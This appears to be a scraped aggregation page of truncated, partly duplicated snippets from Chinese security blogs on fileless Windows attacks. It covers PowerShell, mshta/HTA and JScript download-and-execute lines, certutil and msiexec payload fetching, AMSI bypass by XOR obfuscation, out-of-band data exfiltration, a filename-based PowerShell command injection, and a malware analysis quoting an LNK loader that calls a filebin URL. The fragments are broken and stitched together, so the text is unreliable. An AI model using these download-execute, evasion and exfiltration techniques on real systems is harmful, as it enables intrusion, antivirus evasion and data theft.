无文件落地攻击流程: 1.远程加载恶意脚本 2.注入内存 3.写入注册表(或者自运行) 恶意脚本执行加载都不会在磁盘驱动器中留下文件,那么可以消除将传统的恶意软件PE(可移植可执行文件)复制到磁盘驱动器的传统步骤来逃避检测...无文件攻击的问题在于,它们利用易受攻击的合法白名单应用程序,并利用内置的操作系统可执行文件。阻止用户和操作系统共同依赖的应用程序,并不是一个好的选项。...应用程序) bat处理 (脚本解析器) 》》》cmd.exe(应用程序) javaSrtipt(脚本解析器) 》》》mshta.exe(应用程序) 利用流程: 远程加载对应payload脚本,直接调用解析器注入内存中运行...(当然也可以上传脚本到目标中再调用脚本解析器去运行,但是这样不属于无文件落地手法,这里不讨论) 1.powershell(脚本解析器)利用 powershell是微软一种命令行shell程序和脚本环境...PowerShell 是一种跨平台的任务自动化和配置管理框架,由命令行管理程序和脚本语言组成。
我去前面探探路 众所周知,Powershell早已被集成到了windows的环境中,国外大牛玩得不亦乐乎,而国内圈子却很少听到讨论Powershell的,至少我身边只有一位小伙伴一起研究,HTA更不用说了...HTA是HTML-Application的缩写,是软件开发的新概念,直接将某个html页面保存成hta的格式,就是一个独立的应用软件,点开与网页内容并无区别,界面与VB、C++等程序语言所设计的软件界面没什么差别...HTA本来就是被设计为制作桌面程序的,所以能直接调用其他组件执行命令。...windows自带hta环境,cmd中输入 mshta 你会发现,已经集成在win环境里了,输入完并不会弹出什么,只是确定不报错就证明有这个东西,所以说白了,运行hta跟运行exe简直一样,双击即可。...如果想假装闪退效果,可以直接在脚本结尾加入执行 “taskkill /f /im mshta.exe” kill掉mshta的进程,因为shellcode是注入在powershell中执行的,只要powershell
JScript,由微软开发的活动脚本语言,典型脚本后缀名.js VBScript,基于Visual Basic程序语言的脚本语言,典型脚本后缀名称.vbs PowerShell,可以认为是增强型CMD,...wscript //e: 或者cscript //e: 方式执行 对于方案b来讲,常见对抗方法: 1.脚本文件头部,中间,尾部插入格式控制字符 2.对关键代码进行编码,混淆等操作 2.2 优雅抱大腿 白名单机制可以尽可能的减少对正常操作者的误报情况发生...从2016起年高度爆发的通过脚本进行下载传播敲诈者的案例数不胜数,一个典型的js下载执行代码如下 var oShell = new ActiveXObject("WScript.Shell");var...0x1、宏安全(恶意宏代码) 抽样统计显示,通过执行文档中的宏代码,直接下载恶意程序是目前攻击者使用的主要方式,用户打开文档中招后就会连接远端下载恶意程序,从而导致用户计算机中毒,攻击者使用这种攻击方式的好处是可以随时在云端替换下载文件...针对特定目标投递含有恶意代码的PDF文档,安全意识薄弱的用户只要打开PDF文档就会中招。 0x0、释放运行 PDF中是允许包含docm文件。
1、介绍 PowerShell 可以简单的理解为 cmd 的高级版,cmd 能做的事在 PowerShell 中都能做,但 PowerShell 还能做很多 cmd 不能做的事情。...PowerShell 有如下特点: Windows 7 以上的操作系统默认安装 PowerShell 脚本可以运行在内存中,不需要写入磁盘 可以从另一个系统中下载 PowerShell 脚本并执行 目前很多工具都是基于...PowerShell 开发的 很多安全软件检测不到 PowerShell 的活动 cmd 通常会被阻止运行,但是 PowerShell 不会 可以用来管理活动目录 可输入 Get-Host 或者 $PSVersionTable...\aps1,最大的例外是,如果 PowerShell 脚本文件刚好位于你的系统目录中,那么你可以直接在命令提示符命令提示符后键入脚本文件名即可运行” 这里的“系统目录”是指的啥目录?...-WindowStyle Hidden (-W Hidden):隐藏窗口 -NoProfile (-NoP):不加载当前用户的配置文件 –Enc:执行 base64 编码后的 powershell 脚本字符串
@#1 image.png 图2-2-4 利用PowerShell成功克隆管理员 注:护卫神“用户监控”的原理是检测攻击者是否存在新建用户行为和Administrators管理组中是否存在其它用户,如果存在则立即删除该用户...因为用PowerShell脚本克隆的90sec用户不属于任何组的成员,所以护卫神无法删除90sec这个具有管理员权限的用户。...新版本中结束hws.exe、hwsd.exe进程后会自动重复的运行,防护功能依然是正常的。...] 功能介绍:“运行限制”这个功能是在IIS加固模块里的,主要设置选项有3个(禁止运行危险组件、禁止获取系统信息、禁止运行PSO组件)。...”的原理是通过禁止一些危险组件(Wscript.Shell、Shell.Application、Winmgmts、IISNamespace等)来阻止攻击者利用WebShell脚本木马调用这些危险组件来执行系统命令
FTP是运行匿名登陆的,那我们进行远程登陆FTP看看有什么东西。 ? 这里我用wget递归下载FTP文件。...powershell正常的,那我们本地搭建一个简易的HTTP服务器放上我们的powershell反弹shell脚本,让靶机进行远程下载执行反弹一个shell。...然后在目标靶机telnet上执行这段代码,就是远程执行powershell脚本。...我们在刚刚反弹的shell中去执行这个脚本,来检测目标系统的信息。...在查找的过程中我在公共用户的目录里面找到一个快捷连接。 ? 百度下具体信息。 ? 用type查看下内容,发现一些关键信息 ?
在这篇博客中,我将展示另外两种诱导受害者运行恶意代码的方法。两种方法都需要一定量的用户交互。...保护模式IE被禁用用于控件,这确实会阻止显示其他对话框——如UAC对话框。因此,只需要两次单击就可以运行恶意代码,即单击以激活,然后运行/打开。...Poc 下面的PowerShell脚本将尝试创建包含嵌入式Internet Explorer对象的Word文档。该脚本使用Packager对象创建一个嵌入文件的对象,单击该对象将触发文件下载功能。...Poc 以下PowerShell脚本可用于创建具有嵌入的Forms.HTML:Image.1对象的Word文档,单击该对象将导致计算器打开。...最后的话 Red Teamers(和攻击者)一直在寻找新方法,他们并不关心什么符合安全修复的标准。作为一名防守者,知道什么样的攻击有助于阻止他们(工具者)。
1.是Windows原生的2.可以调用Windows API3.无文件执行命令4.可以逃避Anti-Virus的检测(这个其实现在还比较敏感了)5.被大多数程序加入白名单中,标记为可信的6.有许多开源的渗透工具集...windows为powershell设计了一个名为Execution Policy,即执行策略的东西来决定哪些类型的PowerShell脚本可以在系统中运行。...•阻止运行所有脚本文件,包括格式化和配置文件 ( .ps1xml)、模块脚本文件 ( .psm1) 和 PowerShell 配置文件 ( .ps1)。 AllSigned •脚本可以运行。...•运行从 Internet 下载且未签名的脚本(如果脚本未阻止,例如使用Unblock-Filecmdlet)。•有运行来自互联网以外来源的未签名脚本和可能是恶意的签名脚本的风险。...•此执行策略设计用于将 PowerShell 脚本内置到更大应用程序中的配置,或用于将 PowerShell 作为具有自己的安全模型的程序的基础的配置。
很多小伙伴在使用 VScode 自带程序终端的时候会报出"系统禁止脚本运行的错误", 准备的原因,是因为 PowerShell 执行策略的问题。...为什么要弄这么一个执行策略呢,因为powershell能做的事情太多了,为了避免一些恶意脚本直接运行,一般家用的windows系统默认将执行策略设置成了“Restricted”,即受限制的。 ...我们可以运行命令来查看自己电脑上的执行策略被设置成了什么: cmd Get-ExecutionPolicy -LIST 显示: Scope ExecutionPolicy ---...(安全但是本地编写的脚本也要签名,麻烦) Bypass. 不会阻止你运行任何脚本,也没有提示和警告。(不安全) Default....(这里的Undefined不知道是什么东西,先不管它) Unrestricted. 从PowerShell 6.0开始,这是非Windows系统的默认执行策略,并且不能更改。
微软在windows 7+的系统中内置了一种强大的脚本语言Powershell。正如其名,这款语言十分强大。不过,强大的语言带来的方便的同时,也增加了安全问题。...直接在chm中写入powershell代码你会发现,执行powershell会弹出一个黑框?代码执行了没有生效?...(至于为什么没有生效,可能跟CHM的语法相关,我尝试过修改参数格式几次后没再尝试了,有兴趣的同学可以去查阅资料。)弹出一个黑框?这不就完全暴露了自己是木马了吗?... 上述powershell命令中存在特殊字符,导致命令失效。这时,我们可以将powershell要执行的命令进行base64编码来解决该问题。...可是由于powershell脚本会弹出黑框,容易被发现,因此需要先生成中间层的不容易被发现的简易shell,来执行powershell脚本代码。最终实现不弹黑框、功能强大的shell环境。
---- 1、PowerShell PowerShell是一种命令行外壳程序和脚本环境,使命令行用户和脚本编写者可以利用。...4、wget Windows环境下,可上传免安装的可执行程序wget.exe到目标机器,使用wget下载文件。...而hta中也支持VBS。所以我们可以利用hta来下载文件。...13、regsvr32 Regsvr32命令用于注册COM组件,是Windows系统提供的用来向系统注册控件或者卸载控件的命令,以命令行方式运行 在目标机上执行: regsvr32.exe /u /n...14、MSXSL.EXE msxsl.exe是微软用于命令行下处理XSL的一个程序,所以通过他,我们可以执行JavaScript进而执行系统命令。
[TOC] 0x00 前言 描述:作为一个网络安全从业者,您可能会常常在渗透测试中遇到只有一个Shell情况下如何将可执行文件上传到一台windows机器上(主要由于没有界面操作),我在实际渗透测试中将我的经验和方法进行分享...; 0x01 方式 (1) debug 描述:debug是一个程序调试工具功能包括:直接输入,更改,跟踪,运行汇编语言源程序,观察操作系统的内容看ROM BIOS的内容,观察更改RAM内部的设置值,以扇区或文件的方式读写软盘数据...中的利用测试系统安装Office软件,下载执行dll对应的powershell代码如下: $path="D:\test\msg1.dll" certutil.exe -urlcache -split...(); (8) hta 描述:添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序 以下代码保存为.hta文件: <head...WeiyiGeek. 3)Python 相当于把Python脚本进行base64编码然后重新解码执行 python -c "import urllib2; exec urllib2.urlopen('
[TOC] 0x00 前言 描述:作为一个网络安全从业者,您可能会常常在渗透测试中遇到只有一个Shell情况下如何将可执行文件上传到一台windows机器上(主要由于没有界面操作),我在实际渗透测试中将我的经验和方法进行分享...; 0x01 方式 (1) debug 描述:debug是一个程序调试工具功能包括:直接输入,更改,跟踪,运行汇编语言源程序,观察操作系统的内容看ROM BIOS的内容,观察更改RAM内部的设置值,以扇区或文件的方式读写软盘数据...补充说明: 生成的demo.cmd可以采用Powershell来进行hex转成为exe可执行文件 WeiyiGeek....中的利用测试系统安装Office软件,下载执行dll对应的powershell代码如下: $path="D:\test\msg1.dll" certutil.exe -urlcache -split...(); (8) hta 描述:添加最小化和自动退出hta程序的功能,执行过程中会最小化hta窗口,下载文件结束后自动退出hta程序 以下代码保存为.hta文件: <head
3.客户端连接执行命令,服务端启动相应的程序并执行回显数据。 4.运行完后删除服务。...即使WinRM服务正在运行,也无法接收或发送请求数据的WS-Management协议消息。 Internet连接防火墙(ICF)阻止访问端口。...在powershell中我们可以使用 get-CimInstance来列出本地COM程序列表 远程DCOM对象的实例表现如下: 客户端计算机从远程计算机请求实例化由CLSID表示的对象。...DLL路径") 8.任意脚本执行 通过CreateObject和ScriptControl执行OutlookScript 使用Outlook访问ScriptControl COM类,攻击者(我们)可以利用该字符串运行以字符串格式提供的脚本...此外,我们可以将加载jscript.dll或vbscript.dll来运行脚本本身。 限制: ScriptControl对象仅在32位版本中可用。
0x01 前言 在渗透测试中我们时常会遇到一些无回显的场景,如常见的:SQL盲注、命令执行、XSS、SSRF、Blind XXE等漏洞,这时就需要利用第三方dnslog/httplog平台才能将数据和命令执行结果外带出来...这篇文章我们主要以命令执行漏洞为例来介绍几个常用的数据外带平台和方式,不会再去细讲每个漏洞的外带利用方式,因为写的师傅太多了,想了解的可以自己去百度搜索相关资料学习下吧。...Base64编码写文件: whoami>temp & certutil -encode temp temp1 & findstr /L /V CERTIFICATE temp1>temp2 HTTP外带执行结果...python -m SimpleHTTPServer 8888 python3 -m http.server 8888 接着我们再执行以下命令即可,外带出来的执行结果会显示在开启的Web日志中。...,通过修改脚本文件内容来外带不同命令的执行结果,如:查看当前权限、进程/服务、文件和目录及下载文件等。
我们在一次测试中偶然发现,由于信任未过滤的文件名,因此在运行特殊命名的脚本时,PowerShell可能会执行任意代码。...但是,如果这些脚本是从PowerShells Shell运行的而不是“ cmd.exe”,则“&”(调用运算符)将阻止我们的漏洞利用。...我的PoC测试下载一个远程可执行文件,将其保存到计算机中,然后执行它,而与PS文件本身的内容无关紧要。PS文件本身就是一个简单的:Write-Host “Hello World!”...测试过程如下: 1、生成powershell命令:首先,我们创建一个用于混淆的Base64编码的文件名;它将下载并执行一个在本例中名为“ calc.exe”的远程可执行文件。...例如 test; powershell -e 编码命令>; 2.ps1 3、双击以在PowerShell中打开,效果如下: ? 或者在命令行下执行: ?
->download&exec JScript调用powershell实现下载执行的代码为: new ActiveXObject("WScript.Shell").Run("powershell (new-object...->download&exec 6、msiexec 该方法我之前的两篇文章《渗透测试中的msiexec》《渗透技巧——从Admin权限切换到System权限》有过介绍,细节不再赘述 首先将powershell...实现下载执行的代码作base64编码: $fileContent = "(new-object System.Net.WebClient).DownloadFile('https://github.com...msiexec.exe 7、mshta mshta支持http和htpps 但mshta在执行hta脚本时,类似于浏览器,会根据链接返回头进行对应的解析操作,所以这里只有当返回头为html时才会运行 否则会被当普通文本进行解析...再次测试,成功实现下载执行的功能 经过以上的测试,我们发现IE浏览器默认会拦截vbs脚本实现的下载功能 那么,我们可以大胆猜测,如果下载执行换成powershell实现的话,那么就不会被拦截 修改脚本,
当脚本准备好提供给脚本引擎时,应用程序可以调用 Windows AMSI API 来请求对内容进行扫描。这样,就可以在决定继续执行之前安全地确定脚本是否是恶意的。 即使脚本是在运行时生成的,也是如此。...如果识别出已知特征,则不会启动执行,并且会显示一条消息,表明脚本已被防病毒软件阻止。下图说明了 AMSI 扫描的过程。 ?...其实不难理解,首先我们要知道我们的恶意脚本是如何注入内存执行的 bypass 杀毒软件时我们的脚本一定是模糊处理的,但是无论我们什么样模糊处理到注入内存执行的时候一定是纯净,清晰的代码,不然脚本引擎无法理解和执行我们的恶意脚本...($bytes | % {[char] ($_ -bxor 0x33)}) #进行XOR编码 iex $string #执行命令 然后我们使用powershell ISE 执行来模拟我们在实战中的无文件落地直接内存加载执行的手法...检测到时停止恶意宏 如果行为被评估为恶意,则停止执行宏。Office 应用程序会通知用户,并关闭应用程序会话以避免任何进一步的损害。这可以阻止攻击,保护设备和用户。
在内存中执行 PowerShell 脚本以进行逃避检测 打开诱饵分散受害者的注意力 后文对感染链进行了深入分析,并对 Quantum Builder 生成的 Payload 进行了比较。...执行后 LNK 文件会运行混淆的PowerShell代码,经过base64解编码与异或解密得到执行命令 IEX mshta https[:]//filebin.net/njqyvfot61w0tu9a/...【HTA 主要函数】 解密出来的 PowerShell 脚本如下所示: 【解密 PowerShell 代码】 解密完成后,恶意函数就会通过 CreateObject() 创建一个 Wscript.Shell...基于 PowerShell 的 CMSTP UAC 绕过 PoC 脚本在执行时会在 Temp 目录中写入恶意 INF 文件,其中 PowerShell 脚本中的 $CommandToExecute变量是...该脚本将 [ENTER] 按键发送到活动的窗口应用程序,以便使用 SendKeys.SendWait() 函数自动执行。
在渗透过程中,攻击者往往需要通过命令下载执行恶意代码,实现信息收集、持久化、权限提升、防御绕过、提取凭证、横向移动、数据渗出等操作。...在目标主机执行恶意代码,可以分为上传/下载并执行恶意代码和无文件远程恶意代码执行。接下来,我们来总结一下Linux和Windows中下载和执行恶意代码的一些姿势。...一、Linux 远程恶意代码执行 01、curl 以用curl的方式执行http页面上的shell脚本,无需download,在本地机器上直接执行。...Powershell 利用powershell远程执行ps1脚本。...msiexec /q /i http://192.168.28.128/evil.msi 08、IEExec IEexec.exe应用程序是.NET Framework附带程序,运行IEExec.exe
领取专属 10元无门槛券
手把手带您无忧上云
云服务器
ICP备案
对象存储
腾讯会议
云直播
